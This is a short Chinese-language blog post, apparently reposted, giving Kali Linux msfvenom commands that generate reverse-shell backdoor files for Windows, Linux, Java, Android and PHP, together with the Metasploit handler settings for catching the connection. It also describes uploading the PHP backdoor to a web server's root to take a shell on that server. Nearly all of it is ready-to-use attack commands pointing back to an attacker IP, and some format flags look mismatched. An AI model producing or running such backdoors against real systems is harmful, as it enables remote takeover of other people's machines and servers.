您的位置:首页 > 运维架构 > Linux

kali linux 生成后门文件命令:PHP,java,Linux,windows,android

2017-11-13 12:41 1046 查看


生成后门文件:

在这里需要用到一个命令:msfvenom

在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。

下面示例的参数的解释直接通过-h参数查看就好,在下面就不再做多的说明了。

Windows后门:

[plain] view
plain copy

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=1234 -f exe -o win_backdoor.exe &nbs
4000
p;



在msf控制台中,分别输入:

search handle

use exploit/multi/handler

show options

set payload windows/meterpreter/reverse_tcp

set LHOST 10.10.10.162

set LPORT 1234

最后执行exploit开始监听

将文件保存在Windows server 2k3中并运行,可以在Kali的监听窗口中得到meterpreter:



Linux后门:

[plain] view
plain copy

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.162 LPORT=4321 -f exe -o lin_backdoor

Java后门:

[plain] view
plain copy

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=1324 -f war -o java_backdoor.jar

Android后门:

[plain] view
plain copy

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=2143 -f raw -o android_backdoor.apk

PHP后门:

[plain] view
plain copy

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.162 LPORT=2134 -f raw -o php_backdoor.php

将生成php后门文件上传到Windows server 2k3的Web根目录中,在Kali中跟上面的示例一样来监听端口,然后在第三台主机XP上对其进行访问,因为php文件是在服务器端执行的,可直接获得该Web服务器的shell:

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: